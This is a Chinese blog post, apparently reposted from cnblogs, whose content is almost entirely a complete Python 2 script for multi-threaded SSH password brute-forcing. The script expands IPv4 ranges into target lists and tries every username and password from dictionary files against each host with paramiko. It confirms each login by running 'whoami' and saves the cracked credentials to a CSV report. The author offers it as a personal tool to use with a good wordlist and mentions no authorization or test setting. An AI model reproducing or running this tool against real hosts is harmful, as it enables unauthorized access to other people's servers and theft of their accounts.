多线程sshd爆破程序代码

不多说了,直接上手代码,也没有啥练手的,都是很熟悉的代码,水一篇,方便作为工作的小工具吧。试了一下,配合一个好点的字典,还是可以作为个人小工具使用的。

#!/usr/bin/env python
# -*- coding:utf-8 -*-

'''
SSH服务弱口令扫描脚本
'''

#引入包文件
import ipaddr
import logging
import datetime
import paramiko
import threading
from optparse import OptionParser

#定义全局配置
logging.basicConfig(format="%(message)s",level=logging.INFO)

#定义全局变量
username_config_file = "../config/username.conf"
password_config_file = "../config/password.conf"
username_list = []
password_list = []
target_list = []
result_list = []
multi_thread = False


#定义全局接口函数
def read_config_from_file():
"""从配置文件夹下的字典文件中读取爆破用户名和口令"""
global username_list
global password_list
#读取用户名字典
with open(username_config_file,"r") as fr:
for line in fr.readlines():
username = line.split(" ")[0].split(" ")[0]
username_list.append(username)
#读取口令字典
with open(password_config_file,"r") as fr:
for line in fr.readlines():
password = line.split(" ")[0].split(" ")[0]
password_list.append(password)
#字典列表去重
username_list = list(set(username_list))
password_list = list(set(password_list))


def change_config_files(username_file=None,password_file=None):
"""指定用户名和口令的字典配置文件"""
global username_config_file
global password_config_file
if username_file != None:
username_config_file = username_file
if password_file != None:
password_config_file = password_file

def target_analyst(target):
"""对于目标网络地址分析并拆分其中的地址段 仅支持IPv4"""
global target_list
target = ipaddr.IPv4Network(target)
hosts_list = target.iterhosts()
for host in hosts_list:
target_list.append(str(host))

def target_file_anylast(filename):
"""分析目标列表文件"""
file_to_target = []
with open(filename,"r") as fr:
for line in fr.readlines():
each_target = line.split(" ")[0].split(" ")[0]
file_to_target.append(each_target)
return file_to_target


def send_crack_packet(target,username,password,port=22,timeout=3):
"""发送爆破登录报文"""
global result_list
#局部变量
flag = False#是否有漏洞的标志位,默认False
#创建SSH对象并登陆
logging.info("[+] 爆破对象 地址%s 端口:%s 用户名:%s 口令:%s"%(str(target),str(port),str(username),str(password)))
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname=target, port=port, username=username, password=password,timeout=timeout,allow_agent=False,look_for_keys = False)
#执行命令
stdin, stdout, stderr = ssh.exec_command('whoami',timeout=timeout)
#获取命令结果
result = stdout.read().split(" ")[0]
if result == username:
flag = True
report_sting = "%s,%s,%s,%s,%s "%(str(target),"YES",str(port),str(username),str(password))
result_list.append(report_sting)
logging.info("[*] 爆破成功: 详细信息[地址:%s,端口:%s,用户名:%s,口令:%s]"%(str(target),str(port),str(username),str(password)))
try:
if multi_thread == False:
continue_flag = raw_input("是否继续?[1]继续[2]退出")
continue_flag = int(continue_flag)
else:
continue_flag = 1
except Exception,ex:
continue_flag = 2
if continue_flag != 1:
exit(0)
except Exception,ex:
pass
#关闭连接
ssh.close()
return flag


def create_report():
"""生成报告文件"""
time_string = str(datetime.datetime.now()).replace(" ","").replace(":","")
fd = open("../result/%s.csv"%time_string,"w")
fd.write("Target-IP,WEAK,PORT,USERNAME,PASSWORD ")
for result_string in result_list:
fd.write(result_string)
fd.close()


def parameter_checker(parameter):
"""参数检查函数"""
if parameter in ["",None," ","null"]:
return False
else:
return True


def list_devide(object_list,count):
"""列表拆分函数"""
return_list = []
if not isinstance(object_list,list):
return []
else:
total = len(object_list)
size = total/count + 1
start = 0
end = start + size
while True:
if end <= total:
return_list.append(object_list[start:end])
elif end > total and start < total:
return_list.append(object_list[start:])
elif start > total:
break
else:
break
start += size
end += size
return return_list

class cracker(threading.Thread):
"""多线程爆破类"""
def __init__(self,target_list,timeout):
"""多线程爆破构造函数"""
threading.Thread.__init__(self)
self.__target_list = target_list
self.__timeout = timeout

def run(self):
for target in self.__target_list:
for username in username_list:
for password in password_list:
send_crack_packet(target=target,username=username,password=password,timeout=self.__timeout)


if __name__ == '__main__':
parser = OptionParser()
parser.add_option("-a","--target",dest="target",help="Target IP Addresses!")
parser.add_option("-i","--infile",dest="infile",help="Target IP Addresses File!")
parser.add_option("-u","--user",dest="userfile",help="Username Dictionary File!")
parser.add_option("-p","--pswd",dest="pswdfile",help="Password Dictionary File!")
parser.add_option("-o","--outfile",dest="outfile",help="Create A Report File! If [Yes] Create Report!")
parser.add_option("-n","--thread",dest="threadnum",help="Count Of Thread!")
parser.add_option("-t","--timeout",dest="timeout",help="Timeout Of Seconds!")
(options, arges) = parser.parse_args()
try:
options.threadnum = int(options.threadnum)
except Exception,ex:
options.threadnum = 1
options.threadnum = 10 if options.threadnum > 10 else options.threadnum
try:
timeout = int(options.timeout)
except Exception,ex:
timeout = 3
timeout = 60 if timeout >= 60 else timeout
if (parameter_checker(options.target) or parameter_checker(options.infile)) == False:
logging.error("[-] 输入参数错误!!!")
exit(0)
logging.info("[+] 目标初始化...")
if options.infile != None:
ret = target_file_anylast(options.infile)
for item in ret:
if item.find("/") >= 0 or item.find("-") >= 0:
target_analyst(item)
else:
target_list.append(item)
if options.target != None:
if options.target.find("/") >= 0 or options.target.find("-") >= 0:
target_analyst(options.target)
else:
target_list.append(options.target)
logging.info("[+] 目标初始化完成!!!")
if (parameter_checker(options.userfile) or parameter_checker(options.pswdfile)) == True:
logging.info("[+] 配置字典文件!!!")
change_config_files(username_file=options.userfile,password_file=options.pswdfile)
read_config_from_file()
logging.info("[+] 开始扫描")
#单线程爆破
if options.threadnum == 1:
for target in target_list:
for username in username_list:
for password in password_list:
send_crack_packet(target=target,username=username,password=password,timeout=timeout)
#多线程爆破
else:
multi_thread = True
thread_list = []
thread_target_list = list_devide(target_list,options.threadnum)
for thread_target in thread_target_list:
thread_object = cracker(thread_target,timeout)
thread_list.append(thread_object)
for thread in thread_list:
thread.start()
for thread in thread_list:
thread.join()
if parameter_checker(options.outfile) and options.outfile == "yes":
logging.info("[+] 生成报告中...")
create_report()
logging.info("[+] 报告已生成!!!")
logging.info("[+] 扫描完成")

原文地址:https://www.cnblogs.com/mutudou/p/13602216.html